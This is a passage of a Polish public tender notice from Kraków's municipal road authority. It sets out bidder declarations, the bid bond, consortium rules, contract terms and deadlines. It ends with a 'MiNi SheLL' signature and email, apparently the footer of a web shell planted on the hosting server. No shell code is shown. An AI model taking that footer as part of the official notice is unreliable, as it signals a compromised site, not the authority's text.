ograniczeń w specjalności<br/>▪ inżynieryjnej drogowej,<br/>▪ instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i<br/>kanalizacyjnych,<br/>▪ instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i<br/>elektroenergetycznych.<br/>Uwaga!<br/>Zamawiający dopuszcza posiadanie w/w uprawnień przez tę samą osobę w ramach różnych branż. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a) Oświadczenie o aktualności informacji zawartych w oświadczeniu o niepodleganiu wykluczeniu (załącznik nr 13 do SWZ).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie 5 lat, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na<br/>rzecz których roboty te zostały wykonane oraz załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, przy czym<br/>dowodami, o których mowa są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów, inne odpowiednie dokumenty (Załącznik nr 6 do SWZ),<br/>Uwaga!<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonywanych wspólnie z innymi Wykonawcami, wówczas<br/>w powyższym wykazie robót budowlanych zobowiązany jest podać jedynie te roboty budowlane, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył.<br/>b) Wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami<br/>budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności<br/>oraz informacją o podstawie do dysponowania tymi osobami (Załącznik nr 7 do SWZ).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda załączenia przez Wykonawcę do oferty przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Wykaz oświadczeń i dokumentów jakie Wykonawca musi dołączyć do oferty:<br/>a) Wypełniony Formularz oferty, zgodnie z załącznikiem nr 1 do SWZ,<br/>b) Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu,<br/>zgodnie z załącznikiem nr 3 do SWZ,<br/>c) Oświadczenie Wykonawcy o niepodleganiu wykluczeniu, zgodnie z<br/>załącznikiem nr 4 do SWZ,<br/>d) Pełnomocnictwo do reprezentowania Wykonawcy w niniejszym<br/>zamówieniu, jeżeli wymieniona osoba/osoby nie zostały wskazane do<br/>reprezentacji we właściwym rejestrze lub ewidencji działalności gospodarczej,<br/>e) Pełnomocnictwo dla lidera (dotyczy Podmiotów wspólnie ubiegających się<br/>o zamówienie, tzw. Konsorcja oraz spółek cywilnych),<br/>f) Oświadczenie o zakresie wykonania zamówienia przez poszczególnych Wykonawców wspólnie ubiegających się o zamówienie, zgodnie z załącznikiem nr 5 do SWZ,<br/>g) Zobowiązanie Podmiotu udostępniającego zasoby, zgodnie z załącznikiem nr 11 do SWZ,<br/>h) Oświadczenie Podmiotu udostępniającego zasoby o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu, zgodnie z załącznikiem nr 12 do SWZ,<br/>i) Oryginał gwarancji lub poręczenia, jeżeli wadium wnoszone jest w innej<br/>formie niż w pieniądzu,<br/>j) Podpisany kosztorys ofertowy. Wykonawca zobowiązany jest dołączyć do<br/>oferty kosztorys ofertowy sporządzony na podstawie załączonych do niniejszej<br/>SWZ Przedmiarów robót, zgodnie z załącznikiem nr 10 do SWZ. Kosztorys ofertowy powinien zawierać cenę jednostkową i wartość do każdej pozycji, dla której została określona w przedmiarze ilość jednostek.<br/>2. Szczegółowe zasady dotyczące sporządzania i przekazywania dokumentów i informacji zawiera SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> a) Przystępując do postępowania Wykonawca zobowiązany jest wnieść wadium w<br/>wysokości 5 000,00 zł (słownie złotych: pięć tysięcy złotych 00/100). Wadium<br/>należy wnieść przed upływem terminu składania ofert,<br/>b) Wadium może być wnoszone w pieniądzu, gwarancjach bankowych,<br/>gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o<br/>których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2024, poz.<br/>419),<br/>c) Wadium wnoszone w pieniądzu należy przelać na konto depozytowe w PKO<br/>BP, nr rachunku: 52 1020 2892 0000 5902 0590 8415,<br/>d) Za termin wniesienia wadium w formie pieniężnej przyjmuje się termin uznania<br/>rachunku bankowego Zamawiającego,<br/>e) W przypadku wniesienia wadium w formie gwarancji lub poręczenia, o których<br/>mowa w lit. b) Części 7 SWZ, Wykonawca przekazuje Zamawiającemu oryginał<br/>gwarancji lub poręczenia w postaci elektronicznej. Wadium musi obejmować<br/>cały okres związania ofertą. Gwarancja lub poręczenie musi zawierać w swojej<br/>treści nieodwołalne i bezwarunkowe zobowiązane wystawcy dokumentu do<br/>zapłaty na rzecz Zamawiającego kwoty wadium płatne na pierwsze pisemne<br/>żądanie Zamawiającego. Wadium należy załączyć do zaszyfrowanej, zgodnie z<br/>zapisami w pkt 1 w Części 8 SWZ, oferty Wykonawcy,<br/>f) Zwrot wadium nastąpi zgodnie z art. 98 ustawy Pzp,<br/>g) Beneficjentem gwarancji jest Zarząd Dróg Miasta Krakowa, ul. Centralna<br/>53, 31-586 Kraków,<br/>h) Zamawiający zatrzymuje wadium zgodnie z zasadami określonymi w art. 98 ust.<br/>6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia<br/>albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie<br/>zamówienia publicznego.<br/>2. W toku prowadzonego postępowania komunikacja pomiędzy Zamawiającym<br/>a Wykonawcami wspólnie ubiegającymi się o udzielenie zamówienia następować<br/>będzie za pośrednictwem lidera (Pełnomocnika), o którym mowa w pkt 1 w Części 5 SWZ.<br/>3. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, każdy<br/>z Wykonawców wraz z ofertą składa oświadczenie o niepodleganiu wykluczeniu<br/>zgodnie z załącznikiem nr 4 do SWZ.<br/>4. Spółka cywilna jest kwalifikowana jako Wykonawcy wspólnie ubiegający się<br/>o udzielenie zamówienia, dlatego jej wspólnicy zobowiązani są ustanowić<br/>Pełnomocnika do reprezentowania w postępowaniu albo reprezentowania<br/>w postępowaniu i zawarcia umowy. Pełnomocnictwo musi być załączone do<br/>oferty. Ponadto, każdy ze wspólników spółki cywilnej zobowiązany jest do złożenia<br/>wraz z ofertą oświadczenia o niepodleganiu wykluczeniu zgodnie z załącznikiem<br/>nr 4 do SWZ.<br/>5. W przypadku spółki cywilnej, zamówienie wykazane na spełnienie warunku<br/>dotyczącego doświadczenia Wykonawcy wykonane przez spółkę, a nie<br/>poszczególnych wspólników, Zamawiający uzna jako zamówienie wykonane przez<br/>pojedynczego Wykonawcę, a nie Wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia.<br/>6. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych<br/>lub doświadczenia Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia mogą polegać na zdolnościach tych Wykonawców, którzy wykonają<br/>roboty budowlane, do realizacji których te zdolności są wymagane.<br/>7. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (wspólnicy spółki<br/>cywilnej) składają wraz z ofertą oświadczenie o zakresie wykonania zamówienia<br/>przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie<br/>z załącznikiem nr 5 do SWZ.<br/>8. Zgodnie z zapisami w pkt 1 w Części 4 SWZ, Zamawiający będzie żądał od<br/>Wykonawców wspólnie ubiegających się o zamówienie/wspólników spółki<br/>cywilnej, dokumentu wymienionego w pkt 1 lit. a) w Części 4 SWZ .<br/>9. Wszyscy Wykonawcy składający wspólną ofertę będą ponosić odpowiedzialność<br/>solidarną za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania<br/>umowy. Zamawiający może w ramach odpowiedzialności solidarnej żądać<br/>wykonania umowy od wszystkich Wykonawców łącznie lub od każdego z osobna. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza zmiany postanowień zawartej umowy zgodnie z przesłankami określonymi w Projektowanych Postanowieniach Umowy - załącznik nr 2 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-10-30 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/zdmk.krakow</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-10-30 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-11-28</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający przewiduje wykluczenie Wykonawcy w zakresie podstaw określonych w art. 108 ust. 1 od pkt 1) do pkt 6) oraz art. 109 ust. 1 pkt 4) ustawy Pzp oraz w art. 7 ust. 1 od pkt 1) do pkt 3) ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2025 r., poz. 514).<br/>2. Wykonawca, jeżeli ma lub miał interes w uzyskaniu danego zamówienia oraz poniósł lub może ponieść szkodę w wyniku naruszenia przez zamawiającego przepisów Pzp przysługują środki ochrony prawnej określone w Dziale IX

Creat By MiNi SheLL
Email: jattceo@gmail.com